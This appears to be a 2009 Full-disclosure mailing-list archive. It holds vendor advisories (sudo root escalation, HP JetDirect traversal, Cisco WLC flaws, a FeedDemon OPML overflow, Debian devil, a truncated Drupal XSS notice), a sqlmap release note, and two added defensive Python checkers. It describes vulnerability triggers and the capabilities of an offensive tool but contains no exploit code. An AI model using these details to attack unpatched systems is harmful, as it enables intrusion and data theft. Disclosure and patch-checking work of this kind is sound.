Mandriva Linux Security Advisory                         MDVSA-2009:033
http://www.mandriva.com/security/
_______________________________________________________________________

Package : sudo
Date    : February 4, 2009
Affected: 2008.0, 2008.1, 2009.0
_______________________________________________________________________

Problem Description:

A vulnerability has been identified in sudo which allowed - depending on the sudoers rules - a sudo-user to execute arbitrary shell commands as root (CVE-2009-0034).

The updated packages have been patched to prevent this.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0034
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team

From DDI.VulnerabilityAlert at ddifrontline.com Wed Feb 4 14:40:50 2009
From: DDI.VulnerabilityAlert at ddifrontline.com (DDI_Vulnerability_Alert)
Date: Wed, 4 Feb 2009 08:40:50 -0600
Subject: [Full-disclosure] DDIVRT-2008-19 HP JetDirect Web Administration Directory Traversal
Message-ID: <2571D31D42513640AE1632FEE100E0E402DD7487@hypercom.defense.local>

Title
-----
DDIVRT-2008-19 HP JetDirect Web Administration Directory Traversal

Severity
--------
High

Date Discovered
---------------
October 23, 2008

Discovered By
-------------
Digital Defense, Inc. Vulnerability Research Team
Credit: Shmoov and r at b13$

Vulnerability Description
-------------------------
The HP-ChaiSOE/1.0 embedded web server on certain HP JetDirect printers allows a potential attacker to gain read-only access to directories and files outside of the web root. An attacker can leverage this flaw to read arbitrary system configuration files, cached documents, etc. Information obtained from an affected host may facilitate further attacks against the host. Exploitation of this flaw is trivial using common web server directory traversal techniques.

Solution Description
--------------------
The vendor has released an update. See http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01623905 for more details.

Digital Defense, Inc. recommends restricting access to the HP JetDirect web administration interface to authorized hosts only.

Tested Systems / Software (with versions)
------------------------------------------
Embedded web server HP-ChaiSOE/1.0 on:
HP JetDirect 2420
HP JetDirect 4250

Vendor Contact
--------------
HP
http://www.hp.com

From psirt at cisco.com Wed Feb 4 16:41:40 2009
From: psirt at cisco.com (Cisco Systems Product Security Incident Response Team)
Date: Wed, 4 Feb 2009 11:41:40 -0500
Subject: [Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Cisco Wireless LAN Controllers
Message-ID: <200902041141.wlc@psirt.cisco.com>

Cisco Security Advisory: Multiple Vulnerabilities in Cisco Wireless LAN Controllers

Advisory ID: cisco-sa-20090204-wlc

http://www.cisco.com/warp/public/707/cisco-sa-20090204-wlc.shtml

Revision 1.0

For Public Release 2009 February 04 1600 UTC (GMT)

Summary
=======

Multiple vulnerabilities exist in the Cisco Wireless LAN Controllers (WLCs), Cisco Catalyst 6500 Wireless Services Modules (WiSMs), and Cisco Catalyst 3750 Integrated Wireless LAN Controllers. This security advisory outlines details of the following vulnerabilities:

  * Denial of Service Vulnerabilities (total of three)
  * Privilege Escalation Vulnerability

These vulnerabilities are independent of each other.

Cisco has released free software updates that address these vulnerabilities. There are no workarounds available for these vulnerabilities.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20090204-wlc.shtml.

Affected Products
=================

Vulnerable Products
+------------------

The following products and software versions are affected for each vulnerability.

Denial of Service Vulnerabilities
+--------------------------------

Two denial of service (DoS) vulnerabilities affect software versions 4.2 and later. All Cisco Wireless LAN Controller (WLC) platforms are affected. A third DoS vulnerability affects software versions 4.1 and later.
The following platforms are affected by this vulnerability:

  * Cisco 4400 Series Wireless LAN Controllers
  * Cisco 4100 Series Wireless LAN Controllers
  * Cisco Catalyst 6500 Series/7600 Series Wireless Services Module (WiSM)
  * Cisco Catalyst 3750 Series Integrated Wireless LAN Controllers

Note: The Cisco Wireless LAN Controller Modules supported on Cisco 2800 and 3800 series Integrated Services Routers are not vulnerable. The Cisco 2000 and 2100 Series Wireless LAN Controllers are also not affected by this vulnerability.

Privilege Escalation Vulnerability
+---------------------------------

Only WLC software version 4.2.173.0 is affected by this vulnerability.

Determination of Software Versions
+---------------------------------

To determine the WLC version that is running in a given environment, use one of the following methods:

  * In the web interface, choose the Monitor tab, click Summary in the left pane, and note the Software Version.

  * From the command-line interface, type "show sysinfo" and note the Product Version, as shown in the following example:

    (Cisco Controller) >show sysinfo

    Manufacturer's Name.. Cisco Systems Inc.
    Product Name......... Cisco Controller
    Product Version...... 5.1.151.0
    RTOS Version......... Linux-2.6.10_mvl401
    Bootloader Version... 4.0.207.0
    Build Type........... DATA + WPS

  * Use the "show wism module controller 1 status" command on a Cisco Catalyst 6500 Series/7600 Series switch if using a WiSM, and note the Software Version, as demonstrated in the following example:

    Router#show wism mod 3 controller 1 status

    WiSM Controller 1 in Slot 3
    Operational Status of the Controller : Oper-Up
    Service VLAN : 192
    Service Port : 10
    Service Port Mac Address : 0011.92ff.8742
    Service IP Address : 192.168.10.1
    Management IP Address : 192.168.1.123
    Software Version : 5.1.151.0
    Port Channel Number : 288
    Allowed vlan list : 30,40
    Native VLAN ID : 40
    WCP Keep Alive Missed : 0

Products Confirmed Not Vulnerable
+--------------------------------

No other Cisco products are currently known to be affected by these vulnerabilities.

Details
=======

Cisco Wireless LAN Controllers (WLCs), Cisco Catalyst 6500 Wireless Services Modules (WiSMs), and Cisco Catalyst 3750 Integrated Wireless LAN Controllers are responsible for system-wide wireless LAN functions, such as security policies, intrusion prevention, RF management, quality of service (QoS), and mobility. These devices communicate with Controller-based Access Points over any Layer 2 (Ethernet) or Layer 3 (IP) infrastructure using the Lightweight Access Point Protocol (LWAPP).

This Security Advisory describes multiple distinct vulnerabilities in the WLCs, WiSMs, and the Cisco Catalyst 3750 Integrated WLCs. These vulnerabilities are independent of each other.

Denial of Service Vulnerabilities
+--------------------------------

These vulnerabilities are documented in the following Cisco Bug IDs and have been assigned the following Common Vulnerabilities and Exposures (CVE) identifiers:

  * CSCsq44516 - CVE-2009-0058

    Web authentication is a Layer 3 security feature that causes the controller to drop IP traffic (except DHCP and DNS related packets) from a particular client until that client has correctly supplied a valid username and password.
    An attacker may use a vulnerability scanner to cause the device to stop servicing web authentication or cause a reload of the device. The following error messages may appear on the console during an active attack:

    SshPmStMain/pm_st_main.c:1954/ ssh_pm_st_main_batch_addition_result: Failed to add rule to the engine: restoring old state
    SshEnginePmApiPm/engine_pm_api_pm.c:1896/ ssh_pme_enable_policy_lookup: Could not allocate message

  * CSCsm82364 - CVE-2009-0059

    An attacker may cause a device reload when sending a malformed post to the web authentication "login.html" page. The following error messages may appear on the WLC console during this attack:

    Cisco Crash Handler
    Signal generated during a signal 11, count 193
    Memory 0x14ef1e44 has been freed!

    Note: A crash file is not generated during this attack.

  * CSCso60979 - CVE-2009-0061

    Affected Cisco WLC, WiSM and Catalyst 3750 Wireless LAN Controller models are vulnerable to a DoS condition that is triggered by the receipt of certain IP packets. Upon receiving these IP packets, the affected device may become unresponsive and require a reboot to recover.

    Note: This vulnerability affects software versions 4.1 and later in the Cisco 4400 series WLCs, Cisco Catalyst 6500 WiSM, and the Cisco Catalyst 3750 Integrated Wireless LAN Controllers. Cisco 4100, 2100, and 2000 series WLCs are not affected by this vulnerability.

Privilege Escalation Vulnerability
+---------------------------------

A privilege escalation vulnerability exists only in WLC software version 4.2.173.0, and could allow a restricted user (i.e., Lobby Admin) to gain full administrative rights on the affected system.

Note: Wireless network users are not affected by this vulnerability.

This vulnerability is documented in Cisco Bug ID CSCsv62283 and has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2009-0062.
Vulnerability Scoring Details
+----------------------------

Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss

  * Certain packets may cause WebAuth services to hang or reload the device (CSCsq44516)

    CVSS Base Score - 6.1
      Access Vector - Adjacent Network
      Access Complexity - Low
      Authentication - None
      Confidentiality Impact - None
      Integrity Impact - None
      Availability Impact - Complete

    CVSS Temporal Score - 5.0
      Exploitability - Functional
      Remediation Level - Official-Fix
      Report Confidence - Confirmed

  * Crash handling invalid post for webauth (CSCsq44516)

    CVSS Base Score - 6.1
      Access Vector - Adjacent Network
      Access Complexity - Low
      Authentication - None
      Confidentiality Impact - None
      Integrity Impact - None
      Availability Impact - Complete

    CVSS Temporal Score - 5.0
      Exploitability - Functional
      Remediation Level - Official-Fix
      Report Confidence - Confirmed

  * WLC TSEC driver may hang or crash the device (CSCso60979)

    CVSS Base Score - 7.8
      Access Vector - Network
      Access Complexity - Low
      Authentication - None
      Confidentiality Impact - None
      Integrity Impact - None
      Availability Impact - Complete

    CVSS Temporal Score - 6.4
      Exploitability - Functional
      Remediation Level - Official-Fix
      Report Confidence - Confirmed

  * Local Management Users may obtain full admin rights (CSCsv62283)

    CVSS Base Score - 9.0
      Access Vector - Network
      Access Complexity - Low
      Authentication - Single
      Confidentiality Impact - Complete
      Integrity Impact - Complete
      Availability Impact - Complete

    CVSS Temporal Score - 7.8
      Exploitability - Functional
      Remediation Level - Official-Fix
      Report Confidence - Confirmed

Impact
======

Successful exploitation of the denial of service vulnerabilities may cause the affected device to hang or reload. Repeated exploitation could result in a sustained DoS condition.

The privilege escalation vulnerability may allow an authenticated user to obtain full administrative rights on the affected system.

Software Versions and Fixes
===========================

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.
+-----------------------------------------------------+
| Vulnerability | Affected | First      | Recommended |
| / Bug ID      | Release  | Fixed      | Release     |
|               |          | Version    |             |
|---------------+----------+------------+-------------|
|               | 4.1      | Migrate to | 4.2.176.0   |
|               |          | 4.2        |             |
|               |----------+------------+-------------|
|               | 4.2      | 4.2.173.0  | 4.2.176.0   |
|               |----------+------------+-------------|
|               | 5.0      | Migrate to | 5.2.157.0   |
| CSCsq44516    |          | 5.2        |             |
|               |----------+------------+-------------|
|               | 5.1      | Contact    | Contact TAC |
|               |          | TAC        |             |
|               |----------+------------+-------------|
|               | 5.2      | Not        | Not         |
|               |          | vulnerable | Vulnerable  |
|---------------+----------+------------+-------------|
|               | 4.1      | Migrate to | 4.2.176.0   |
|               |          | 4.2        |             |
|               |----------+------------+-------------|
|               | 4.2      | 4.2.112.0  | 4.2.176.0   |
|               |----------+------------+-------------|
| CSCsm82364    | 5.0      | Not        | Not         |
|               |          | vulnerable | vulnerable  |
|               |----------+------------+-------------|
|               | 5.1      | Not        | Not         |
|               |          | vulnerable | vulnerable  |
|               |----------+------------+-------------|
|               | 5.2      | 5.2.157.0  | 5.2.157.0   |
|---------------+----------+------------+-------------|
|               | 4.1      | Migrate to | 4.2.176.0   |
|               |          | 4.2        |             |
|               |----------+------------+-------------|
|               | 4.2      | 4.2.117.0  | 4.2.176.0   |
|               |----------+------------+-------------|
|               | 5.0      | Migrate to | 5.2.157.0   |
| CSCso60979    |          | 5.2        |             |
|               |----------+------------+-------------|
|               | 5.1      | Not        | Not         |
|               |          | vulnerable | vulnerable  |
|               |----------+------------+-------------|
|               | 5.2      | Not        | Not         |
|               |          | vulnerable | vulnerable  |
|---------------+----------+------------+-------------|
|               | 4.1      | Not        | Not         |
|               |          | vulnerable | vulnerable  |
|               |----------+------------+-------------|
|               | 4.2      | 4.2.174.0  | 4.2.176.0   |
|               |----------+------------+-------------|
|               | 5.0      | Not        | Not         |
| CSCsv62283    |          | Vulnerable | Vulnerable  |
|               |----------+------------+-------------|
|               | 5.1      | Not        | Not         |
|               |          | Vulnerable | vulnerable  |
|               |----------+------------+-------------|
|               | 5.2      | Not        | Not         |
|               |          | Vulnerable | vulnerable  |
+-----------------------------------------------------+

Note: Customers running 4.1M WLC mesh code, using Cisco Wireless 1510 Access Points (APs) are recommended to migrate to release 4.2.176.0. Customers running 4.1 mesh code, using Cisco Wireless 1520 APs are recommended to migrate to 5.2 or later.

Workarounds
===========

There are no workarounds for any of these vulnerabilities.

Obtaining Fixed Software
========================

Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

Do not contact psirt at cisco.com or security-alert at cisco.com for software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows.

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac at cisco.com

Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC.

Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages.
Exploitation and Public Announcements
=====================================

The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory.

These vulnerabilities were found during internal testing and during the resolution of customer support cases.

Status of this Notice: FINAL
============================

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.

A stand-alone copy or paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20090204-wlc.shtml

In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients.

  * cust-security-announce at cisco.com
  * first-bulletins at lists.first.org
  * bugtraq at securityfocus.com
  * vulnwatch at vulnwatch.org
  * cisco at spot.colorado.edu
  * cisco-nsp at puck.nether.net
  * full-disclosure at lists.grok.org.uk
  * comp.dcom.sys.cisco at newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.

Revision History
================

+------------------------------------------------------------+
| Revision 1.0 | 2009-February-04 | Initial public release.  |
+------------------------------------------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt.

+--------------------------------------------------------------------
Copyright 2008 - 2009 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------

Updated: Feb 04, 2009                                Document ID: 108336

From svrt at bkav.com.vn Thu Feb 5 08:15:45 2009
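The following is an added example, not Cisco's own tooling, for the Cisco WLC advisory above: it turns the "Determination of Software Versions" steps and the Software Versions and Fixes table into an exposure check, reading the running version from "show sysinfo" or "show wism ... status" output and reporting, per bug ID, whether the release train is fixed, vulnerable, migration-only, or not affected. The table is transcribed from the advisory; the regex, helper names and the additional test versions are assumptions made for this example.

```python
"""Exposure check for cisco-sa-20090204-wlc.

Added example, not Cisco's tooling. It reads the running version from the
"show sysinfo" (Product Version) or "show wism ... controller ... status"
(Software Version) output quoted in the advisory and compares it with the
Software Versions and Fixes table. The table is transcribed from the
advisory; the regex, helper names and the extra test versions are
assumptions made for this example.
"""
import re

# Per bug ID: release train -> first fixed version in that train, a
# migration target, "contact TAC", or None when the train is not affected.
FIXED = {
    "CSCsq44516": {"4.1": "migrate 4.2", "4.2": "4.2.173.0",
                   "5.0": "migrate 5.2", "5.1": "contact TAC", "5.2": None},
    "CSCsm82364": {"4.1": "migrate 4.2", "4.2": "4.2.112.0",
                   "5.0": None, "5.1": None, "5.2": "5.2.157.0"},
    "CSCso60979": {"4.1": "migrate 4.2", "4.2": "4.2.117.0",
                   "5.0": "migrate 5.2", "5.1": None, "5.2": None},
    "CSCsv62283": {"4.1": None, "4.2": "4.2.174.0",
                   "5.0": None, "5.1": None, "5.2": None},
}

# The advisory text narrows the privilege escalation bug to exactly one
# build, which is tighter than the table's "first fixed" entry above.
EXACT_ONLY = {"CSCsv62283": (4, 2, 173, 0)}

# Matches "Product Version...... 5.1.151.0" or "Software Version : 5.1.151.0".
VERSION_RE = re.compile(
    r"^(?:Product Version\.+|Software Version\s*:)\s*(\d+(?:\.\d+)+)\s*$",
    re.MULTILINE)


def to_tuple(text):
    """'4.2.176.0' -> (4, 2, 176, 0), so versions compare numerically."""
    return tuple(int(part) for part in text.split("."))


def parse_version(cli_output):
    """Return the running version as an int tuple, e.g. (5, 1, 151, 0)."""
    match = VERSION_RE.search(cli_output)
    if match is None:
        raise ValueError("no Product Version / Software Version line found")
    return to_tuple(match.group(1))


def exposure(version):
    """Map each bug ID to 'fixed', 'vulnerable', 'not vulnerable',
    'migrate to X', 'contact TAC' or 'unknown train' for this version."""
    train = f"{version[0]}.{version[1]}"
    status = {}
    for bug, table in FIXED.items():
        if bug in EXACT_ONLY:
            status[bug] = ("vulnerable" if version == EXACT_ONLY[bug]
                           else "not vulnerable")
        elif train not in table:
            status[bug] = "unknown train"  # release not covered by the advisory
        elif table[train] is None:
            status[bug] = "not vulnerable"
        elif table[train].startswith("migrate "):
            status[bug] = "migrate to " + table[train].split()[1]
        elif table[train] == "contact TAC":
            status[bug] = "contact TAC"
        else:
            fixed = to_tuple(table[train])
            status[bug] = "fixed" if version >= fixed else "vulnerable"
    return status


# Taken from the advisory's own "show sysinfo" example.
SAMPLE_SYSINFO = """\
(Cisco Controller) >show sysinfo

Manufacturer's Name.. Cisco Systems Inc.
Product Name......... Cisco Controller
Product Version...... 5.1.151.0
RTOS Version......... Linux-2.6.10_mvl401
Bootloader Version... 4.0.207.0
Build Type........... DATA + WPS
"""

if __name__ == "__main__":
    running = parse_version(SAMPLE_SYSINFO)
    for bug, state in exposure(running).items():
        print(f"{'.'.join(map(str, running))} {bug}: {state}")
```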
From: svrt at bkav.com.vn (SVRT-Bkis)
Date: Thu, 5 Feb 2009 15:15:45 +0700
Subject: [Full-disclosure] [SVRT-02-09] FeedDemon (ver<=2.7) Buffer Overflow Vulnerability
Message-ID: <165EA4DFAAC8415F91F3C2B7A1AB810C@minhbqPC>

Title : FeedDemon Buffer Overflow Vulnerability

1. General Information

FeedDemon is known as the most popular Windows RSS Reader, which allows users to easily view and manage RSS feeds from their desktop. In January 2009, SVRT-BKIS detected a buffer overflow vulnerability in this software. Taking advantage of this flaw, hackers can perform remote attacks, install viruses, steal private information, and even take control of users' systems. We have sent the alert to the manufacturer.

Details : http://security.bkis.vn/?p=329

SVRT Advisory : SVRT-02-09
Initial vendor notification : 01-21-2009
Release Date : 02-05-2009
Update Date : 02-05-2009
Discovered by : Le Nhat Minh (SVRT-Bkis)
Security Rating : Critical
Impact : Remote Code Execution
Affected Software : FeedDemon (version <= 2.7)

2. Technical Description

The vulnerability was found in the processing of OPML (Outline Processor Markup Language) files, an XML format for outlines used by RSS readers to store and manage RSS feeds. With OPML, users can easily share their RSS feed lists with others or export these lists to use in other RSS feed readers. However, FeedDemon does not handle this format well enough, which leads to a buffer overflow flaw.

More precisely, the error occurs when users import an OPML file whose "outline" tag has an overly long "text" attribute. FeedDemon, on parsing this file, will crash; and if malicious code is embedded into that file, it will be executed and give hackers system control. Exploitation can be carried out via a file stored on victims' computers or simply a link to such a file. It is this factor that increases the threat of users' computers being attacked remotely.
Taking advantage of the above vulnerability, a hacker might prepare a malicious OPML file and somehow trick users into importing it. He/she might send the file to users directly or send them a link to that file instead. Right after users have imported the file, malicious code will be executed and they will become the hacker's victims.

3. Solution

Rating this vulnerability as high severity, and given that the manufacturer hasn't released any official patch for it, Bkis recommends that users of FeedDemon be careful when importing RSS feed lists from untrustworthy sources.

------------------------------------------------------------------------

About SVRT-Bkis : SVRT, which is short for Security Vulnerability Research Team, is one of Bkis's research groups. SVRT specializes in the detection, alert and announcement of security vulnerabilities in software, operating systems, network protocols and embedded systems.

About Bkis : Bkis is Vietnam's leading center for researching and deploying network security software and solutions.

From bernardo.damele at gmail.com Wed Feb 4 16:59:05 2009
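The check below is an added example for the OPML issue described in the FeedDemon advisory above; it is not Bkis's or FeedDemon's code. It walks an OPML document before it is handed to a reader and reports any <outline> attribute longer than a conservative limit, which is the class of input the advisory says crashes the reader on import. The 256-character limit, the list of checked attributes and the sample document are assumptions constructed for this example.

```python
"""Pre-import sanity check for OPML feed lists.

Added example for the FeedDemon OPML advisory; not Bkis's or FeedDemon's
code. The advisory's crash is triggered by an <outline> element whose
"text" attribute is too long, so this walks an OPML document and reports
every outline attribute longer than a conservative limit before the file
reaches a reader. MAX_ATTR_LEN, CHECKED_ATTRS and SAMPLE_OPML are
assumptions constructed for this example.
"""
import xml.etree.ElementTree as ET

# Attributes an OPML reader typically copies into fixed-size buffers.
CHECKED_ATTRS = ("text", "title", "xmlUrl", "htmlUrl")
MAX_ATTR_LEN = 256  # assumed limit; far above any real feed title


def find_oversized_outlines(opml_bytes, max_len=MAX_ATTR_LEN):
    """Return (path, attribute, length) for every <outline> attribute
    longer than max_len. Path is a 1-based index chain such as
    "outline[2]/outline[1]" so the offending entry can be located."""
    # For untrusted input, parse with defusedxml instead: ElementTree
    # does not limit entity expansion.
    root = ET.fromstring(opml_bytes)
    body = root.find("body")
    if root.tag != "opml" or body is None:
        raise ValueError("not an OPML document: missing <opml>/<body>")

    findings = []

    def walk(parent, prefix):
        for idx, node in enumerate(parent.findall("outline"), start=1):
            path = f"{prefix}outline[{idx}]"
            for attr in CHECKED_ATTRS:
                value = node.get(attr)
                if value is not None and len(value) > max_len:
                    findings.append((path, attr, len(value)))
            walk(node, path + "/")  # nested folders of feeds

    walk(body, "")
    return findings


def is_safe_to_import(opml_bytes, max_len=MAX_ATTR_LEN):
    """True when no outline attribute exceeds the limit."""
    return not find_oversized_outlines(opml_bytes, max_len)


# Constructed sample: one ordinary feed entry, then a folder containing an
# entry whose "text" attribute is far longer than any real feed title.
SAMPLE_OPML = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<opml version="1.0"><head><title>feeds</title></head><body>\n'
    '  <outline text="Example feed" type="rss"'
    ' xmlUrl="http://example.invalid/rss.xml"/>\n'
    '  <outline text="Folder">\n'
    '    <outline text="' + "A" * 3000 + '" type="rss"'
    ' xmlUrl="http://example.invalid/other.xml"/>\n'
    '  </outline>\n'
    '</body></opml>\n'
).encode("utf-8")

if __name__ == "__main__":
    for path, attr, length in find_oversized_outlines(SAMPLE_OPML):
        print(f"refusing import: {path} attribute {attr!r} is {length} chars")
```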
From: bernardo.damele at gmail.com (Bernardo Damele A. G.)
Date: Wed, 4 Feb 2009 16:59:05 +0000
Subject: [Full-disclosure] [Tool] sqlmap 0.6.4 released
Message-ID:

Hi,

I am glad to release sqlmap version 0.6.4.

Introduction
============

sqlmap is an open source command-line automatic SQL injection tool developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.

Changes
=======

Some of the new features include:

* Major enhancement to make the comparison algorithm work properly also on unstable URLs, automatically, by using the difflib SequenceMatcher object.
* Major enhancement to support SQL data definition statements, SQL data manipulation statements, etc. from the user in the SQL query and SQL shell if stacked queries are supported by the web application technology.
* Major speed increase in DBMS basic fingerprint.
* Major bug fix to correctly handle custom SQL "limited" queries on Microsoft SQL Server and Oracle.
* Major bug fix to avoid tracebacks when multiple targets are specified and one of them is not reachable.

Complete list of changes at http://sqlmap.sourceforge.net/doc/ChangeLog.

Download
========

You can download it in various formats:

* Source gzip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.4.tar.gz
* Source bzip2 compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.4.tar.bz2
* Source zip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.4.zip
* DEB binary package, http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.4-1_all.deb
* RPM binary package, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.4-1.noarch.rpm
* Portable executable for Windows that does not require the Python interpreter to be installed on the operating system, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.4_exe.zip

Documentation
=============

* sqlmap user's manual: http://sqlmap.sourceforge.net/doc/README.pdf
* sqlmap developer's documentation: http://sqlmap.sourceforge.net/dev/

Happy hacking!

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F

From devin at debian.org Thu Feb 5 06:30:23 2009
From: devin at debian.org (Devin Carraway)
Date: Thu, 05 Feb 2009 06:30:23 +0000
Subject: [Full-disclosure] [SECURITY] [DSA 1717-1] New devil packages fix buffer overflow
Message-ID:

------------------------------------------------------------------------
Debian Security Advisory DSA-1717                  security at debian.org
http://www.debian.org/security/                           Steffen Joeris
February 05, 2009                     http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : devil
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE Id         : CVE-2008-5262
Debian Bugs    : 511844 512122

Stefan Cornelius discovered a buffer overflow in devil, a cross-platform image loading and manipulation toolkit, which could be triggered via a crafted Radiance RGBE file. This could potentially lead to the execution of arbitrary code.

For the stable distribution (etch), this problem has been fixed in version 1.6.7-5+etch1.

For the testing distribution (lenny), this problem has been fixed in version 1.6.8-rc2-3+lenny1.

For the unstable distribution (sid), this problem has been fixed in version 1.7.5-4.

We recommend that you upgrade your devil package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
-------------------------------

Debian (stable)
---------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
These files will probably be moved into the stable distribution on its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From andros at sas.upenn.edu Thu Feb 5 17:51:59 2009
From: andros at sas.upenn.edu (Andrew Rosborough)
Date: Thu, 05 Feb 2009 12:51:59 -0500
Subject: [Full-disclosure] Drupal Link Module XSS Vulnerability
Message-ID: <498B273F.4090202@sas.upenn.edu>

Drupal Link Module XSS Vulnerability

Security Risk: Moderately Critical
Exploitable: Remotely
Vulnerabilities: Cross Site Scripting
Discovered by: Andrew Rosborough, Justin C. Klein Keane
Tested: Link 5.x-2.5 on Drupal 5.10

Description

Drupal (http://drupal.org) is a robust content management system (CMS) that provides extensibility through hundreds of third party modules. While the security of Drupal core modules is vetted by a central security team (http://drupal.org/security), third party modules are not reviewed for security. The Link module (http://drupal.org/project/link) is a module that extends the Drupal CCK (Content Creation Kit) module (http://www.drupal.org/project/cck) by allowing users to add links to their content types.

Cross Site Scripting (XSS) Vulnerability

